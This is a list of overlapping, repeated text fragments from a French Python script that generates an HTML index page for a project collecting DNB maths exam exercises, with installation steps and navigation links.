"imports nécessaires selon le contexte # Pour générer les fichiers HTML if __name__",
"exo du sujet de polynésie 2020<br><br> Pour générer la documentation il faut installer",
"<p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a été testé sous <b>Linux</b>",
"# On ouvre en écriture le fichier html qui va recevoir le code",
"dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br>",
"source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On",
"</body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if __name__ == \"__main__\":",
"<h3> Installation et utilisation </h3> <p>La procédure a été testé sous <b>Linux</b> uniquement.",
"pass # On remonte d'un niveau #os.chdir(\"../\") # On crée le dossier qui",
"générer la documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a>",
"from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main():",
"############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée pour générer l'ensemble des",
"fait les imports nécessaires selon le contexte # Pour pouvoir créer un répertoire,",
"testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li>",
"sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer",
"test se fait sur le premier exo du sujet de polynésie 2020<br><br> Pour",
"@author : <NAME> \"\"\" Génère une page HTML. \"\"\" pass # On fait",
"partage sur le site de l'APMEP<br> Pour le moment le test se fait",
"a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li>",
"qui sera appelée pour générer l'ensemble des pages HTML. \"\"\" pass # On",
"et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers de la",
"dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir",
"os # On fait les imports nécessaires selon le contexte # Pour générer",
"target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source",
"\"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") # On crée le dossier",
"nécessaires selon le contexte # Pour générer les fichiers HTML if __name__ ==",
"fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a>",
"<a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger",
"<p> Le projet consiste à récupérer tous les exercices des sujets DNB en",
"à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et",
"site de l'APMEP<br> Pour le moment le test se fait sur le premier",
"indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le head for",
"le moment le test se fait sur le premier exo du sujet de",
"<b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\"",
"== \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################ #",
"consiste à récupérer tous les exercices des sujets DNB en partage sur le",
"target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a",
"d'un niveau #os.chdir(\"../\") # On crée le dossier qui va accueillir les fichiers",
"On ajoute les éléments de la barre de navigation for elt in barreDeNavigation:",
"<li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format",
"répertoire, ici pour y mettre les fichiers HTML import os # On fait",
"<h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a été testé sous",
"le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close()",
"target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a",
"utilisation </h3> <p>La procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette",
"On fait les imports nécessaires selon le contexte # Pour pouvoir créer un",
"# Pour pouvoir créer un répertoire, ici pour y mettre les fichiers HTML",
"été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser",
"</p> <h3> Notes </h3> <p> Les fichiers de la documentations sont générés dans",
"index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers de la documentations sont",
"de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont",
"\"w\") # On ajoute le doctype et le head for elt in docTypeHeadStyle:",
"On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre",
"Pour pouvoir créer un répertoire, ici pour y mettre les fichiers HTML import",
"se fait sur le premier exo du sujet de polynésie 2020<br><br> Pour générer",
"<li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script",
"href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n",
"documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3>",
"script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer",
"fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les",
"</ul> </p> <h3> Notes </h3> <p> Les fichiers de la documentations sont générés",
"os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html qui va recevoir",
"le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li>",
"class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\"",
"faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3>",
"-*- # @author : <NAME> \"\"\" Génère une page HTML. \"\"\" pass #",
"l'ensemble des pages HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") #",
"éléments de la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On",
"une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous",
"* ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale",
"server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3>",
"une page HTML. \"\"\" pass # On fait les imports nécessaires selon le",
"<a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler",
"License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\"",
"# On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste",
"On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à",
"href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure",
"href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png",
"ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre de",
"la documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p>",
"pass # On fait les imports nécessaires selon le contexte # Pour pouvoir",
"pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a été",
"le doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre",
"le premier exo du sujet de polynésie 2020<br><br> Pour générer la documentation il",
"selon le contexte # Pour pouvoir créer un répertoire, ici pour y mettre",
"format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la",
"HTML import os # On fait les imports nécessaires selon le contexte #",
"</p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a été testé",
"les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur",
"# On crée le dossier qui va accueillir les fichiers HTML si il",
"pages HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") # On crée",
"DNB en partage sur le site de l'APMEP<br> Pour le moment le test",
"le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les",
"<a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers",
"HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") # On crée le",
"sur le premier exo du sujet de polynésie 2020<br><br> Pour générer la documentation",
"Les fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers",
"qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le",
"Fonction principale qui sera appelée pour générer l'ensemble des pages HTML. \"\"\" pass",
"fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a>",
"2020<br><br> Pour générer la documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\"",
"indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if __name__",
"__name__ == \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################",
"la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et aller",
"<h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([",
"\"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les exercices des sujets",
"<a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La",
"les éléments de la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) #",
"générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier",
"fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a",
"principale qui sera appelée pour générer l'ensemble des pages HTML. \"\"\" pass #",
"générer l'ensemble des pages HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\")",
"# Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera",
"le script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b>",
"# On ajoute les éléments de la barre de navigation for elt in",
"<b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les",
"la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés",
"racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans",
"barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le",
"fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML",
"le contexte # Pour générer les fichiers HTML if __name__ == \"__main__\": from",
"qui va accueillir les fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"):",
"elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n",
"href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans le",
"sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b>",
"href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier",
"projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans le dossier",
"<br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\"",
"Installation et utilisation </h3> <p>La procédure a été testé sous <b>Linux</b> uniquement. <ul>",
"HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en",
"les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br>",
"target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex",
"le contexte # Pour pouvoir créer un répertoire, ici pour y mettre les",
"dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous",
"# On ajoute le doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt)",
"dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\"",
"y mettre les fichiers HTML import os # On fait les imports nécessaires",
"exercices des sujets DNB en partage sur le site de l'APMEP<br> Pour le",
"pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html",
"</html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if __name__ == \"__main__\": main()",
"contexte # Pour pouvoir créer un répertoire, ici pour y mettre les fichiers",
"ajoute le doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On",
"fichier html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On",
"*.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine",
"os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html qui va recevoir le",
"for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On",
"# On remonte d'un niveau #os.chdir(\"../\") # On crée le dossier qui va",
"récupérer tous les exercices des sujets DNB en partage sur le site de",
"import * else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML",
"de l'APMEP<br> Pour le moment le test se fait sur le premier exo",
"if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html qui",
"<li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer",
"le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée pour",
"installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation",
"archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans le dossier",
"open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le head for elt in",
"\"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer",
"<h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les exercices des sujets DNB",
"documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans",
"= open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le head for elt",
"pour y mettre les fichiers HTML import os # On fait les imports",
"et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body",
"le test se fait sur le premier exo du sujet de polynésie 2020<br><br>",
"sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a>",
"de la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute",
"</span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le",
"pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée pour générer l'ensemble",
"uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet",
"Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li>",
"recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et",
"#os.chdir(\"../\") # On crée le dossier qui va accueillir les fichiers HTML si",
"des pages HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") # On",
"si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture",
"class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un",
"fichiers HTML if __name__ == \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes",
"premier exo du sujet de polynésie 2020<br><br> Pour générer la documentation il faut",
"<li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio",
"from HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le",
"pour générer l'ensemble des pages HTML. \"\"\" pass # On remonte d'un niveau",
"page HTML. \"\"\" pass # On fait les imports nécessaires selon le contexte",
"Studio Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b> et lancer",
"Notes </h3> <p> Les fichiers de la documentations sont générés dans le dossier",
"lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers de la documentations",
"overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License",
"target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\"",
"va accueillir les fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\")",
"les fichiers HTML if __name__ == \"__main__\": from HTML_constantes import * else: from",
"import os # On fait les imports nécessaires selon le contexte # Pour",
"main(): \"\"\" Fonction principale qui sera appelée pour générer l'ensemble des pages HTML.",
"le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"])",
"############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui",
"ouvre en écriture le fichier html qui va recevoir le code indexHTML =",
"Pour générer la documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\">",
"l'archive</li> <li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le",
"appelée pour générer l'ensemble des pages HTML. \"\"\" pass # On remonte d'un",
"# On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme",
"\"\"\" pass # On fait les imports nécessaires selon le contexte # Pour",
"fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\"",
"<a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License <a",
"# On fait les imports nécessaires selon le contexte # Pour générer les",
"class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf",
"<a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n",
"python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live",
"\"\"\" Fonction principale qui sera appelée pour générer l'ensemble des pages HTML. \"\"\"",
"tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p>",
"HTML. \"\"\" pass # On fait les imports nécessaires selon le contexte #",
"à récupérer tous les exercices des sujets DNB en partage sur le site",
"not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html qui va",
"le dossier qui va accueillir les fichiers HTML si il n'existe pas if",
"in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les",
"href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier",
"crée le dossier qui va accueillir les fichiers HTML si il n'existe pas",
"# On fait les imports nécessaires selon le contexte # Pour pouvoir créer",
"barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie",
"et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes",
"<b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un",
"href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a>",
"dossier qui va accueillir les fichiers HTML si il n'existe pas if not",
"pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir",
"ici pour y mettre les fichiers HTML import os # On fait les",
"\"\"\" Génère une page HTML. \"\"\" pass # On fait les imports nécessaires",
"spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les exercices",
"contexte # Pour générer les fichiers HTML if __name__ == \"__main__\": from HTML_constantes",
"cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex",
"le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le",
"import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction",
"sujet de polynésie 2020<br><br> Pour générer la documentation il faut installer le paquet",
"zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li>",
"créer un répertoire, ici pour y mettre les fichiers HTML import os #",
"dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers",
"pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\"",
"mettre les fichiers HTML import os # On fait les imports nécessaires selon",
"en écriture le fichier html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\",",
"<NAME> \"\"\" Génère une page HTML. \"\"\" pass # On fait les imports",
"utf8 -*- # @author : <NAME> \"\"\" Génère une page HTML. \"\"\" pass",
"accueillir les fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") #",
"moment le test se fait sur le premier exo du sujet de polynésie",
"HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers",
"doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le",
"</h3> <p> Les fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br>",
"<p>La procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\">",
"n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier",
"Le projet consiste à récupérer tous les exercices des sujets DNB en partage",
"il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le",
"elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute",
"png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a",
"du sujet de polynésie 2020<br><br> Pour générer la documentation il faut installer le",
"Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée",
"On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le",
"les imports nécessaires selon le contexte # Pour pouvoir créer un répertoire, ici",
"else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def",
"On crée le dossier qui va accueillir les fichiers HTML si il n'existe",
"procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive",
"Pour le moment le test se fait sur le premier exo du sujet",
"dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p>",
"générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a",
"indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de",
"body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre de navigation for",
